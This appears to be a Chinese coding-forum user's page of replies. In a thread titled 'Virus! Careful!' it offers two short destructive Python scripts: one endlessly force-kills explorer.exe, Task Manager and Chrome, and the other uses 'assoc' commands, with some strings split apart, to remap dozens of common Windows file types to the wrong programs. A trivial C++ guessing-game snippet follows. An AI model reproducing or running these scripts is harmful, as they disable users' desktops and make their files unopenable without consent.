Lv.1
77ECEA85-EA13-05EE-BA77-E5D95B05D8E2
签名:899FA603-3801-6B87-418A-8B47A6B9A66B 098BEB5F-75C4-64AF-769B-DC002A88590B 038818D0-CD7F-6B86-AB6C-2A78E226643F 1738D4C6-7DFA-E471-8326-E777C158B534
在 病毒!小心! 中回复
试试这个
from os import system
while True:
system("taskkill /f /im explorer.exe >nul 2>nul")
system("taskkill /f /im taskmgr.exe >nul 2>nul")
system("taskkill /f /im chrome.exe >nul 2>nul")2020-04-10T16:05:13 点赞:0
在 病毒!小心! 中回复
#此程序具有破坏性,请谨慎运行
from os import system
system("assoc .png=txtfile")
system("assoc .jpg=txtfile")
system("assoc .bmp=txtfile")
system("assoc .gif=txtfile")
system("assoc .mp3=txtfile")
system("assoc .mp4=txtfile")
system("assoc .avi=txtfile")
system("assoc .wav=txtfile")
system("assoc .doc=txtfile")
system("assoc .docx=txtfile")
system("assoc .xls=txtfile")
system("assoc .xlsx=txtfile")
system("assoc .ppt=txtfile")
system("assoc .pptx=txtfile")
system("assoc .zip=txtfile")
system("assoc .rar=txtfile")
system("assoc .py=pngfile")
system("assoc .cpp=pngfile")
system("assoc .ht" + "m=pngfile")
system("assoc .ht" + "ml=pngfile")
system("assoc .bat=pngfile")
system("assoc .cm" + "d=pngfile")
system("assoc .json=pngfile")
2020-04-11T10:31:36 点赞:0
在 【Python作品分享】史上代码最短的猜数游戏(5行实现,有提示信息)【作品秀】 中回复
#include<bits/stdc++.h>
using namespace std;int main(){srand(time(0));int k,n;while(1){k=rand()%1000;cout<<"INPUT:"<<endl;cin>>n;cout<<n==k?"YES":"NO"<<endl;}}
两行
2021-03-27T18:19:36 点赞:1